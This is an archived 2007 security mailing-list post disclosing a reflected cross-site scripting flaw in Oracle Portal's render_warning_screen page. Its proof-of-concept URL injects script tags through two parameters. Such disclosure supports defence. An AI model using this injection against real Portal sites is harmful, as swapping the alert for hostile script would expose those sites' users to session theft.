Oracle Portal PORTAL.wwv_main.render_warning_screen XSS

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Subject: Oracle Portal PORTAL.wwv_main.render_warning_screen XSS
From: "Sea Shark" <sead3nx@xxxxxxxxx>
Date: Fri, 16 Mar 2007 14:17:53 +0200
Dkim-signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=WNhRG60jeb1z80WQNWMhMO7H6k06C/NRKBUMOtTt4oDj1U/oWcXbe5IAsBYpCj3CxnpzuNdD37TAaj1/3pGIqjTzqE6TuR7iFhmhBTIxv2ABsKi0I1ipNQ7wvUEiqN6DvIdmfB0E3jhYqMRmXp4LdUQUjzzc1DUpZ4x98pbv6fc=

Hi All,

During pentest i have noticed XSS bug in
PORTAL.wwv_main.render_warning_screen application of oracle portal.

http://somesite/pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl='
<script>alert('inT')</script>&p_newurl='<script>alert('ellect')</script>

Greets,
d3nx

Prev by Date: Rot 13 <= (enkrypt.php) Remote File Disclosure Vulnerability
Next by Date: RE: [VulnWatch] iDefense Security Advisory 03.14.07: Trend Micro Antivirus UPX Parsing Kernel Divide by Zero Vulnerability
Previous by thread: Rot 13 <= (enkrypt.php) Remote File Disclosure Vulnerability
Next by thread: RE: [VulnWatch] iDefense Security Advisory 03.14.07: Trend Micro Antivirus UPX Parsing Kernel Divide by Zero Vulnerability
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux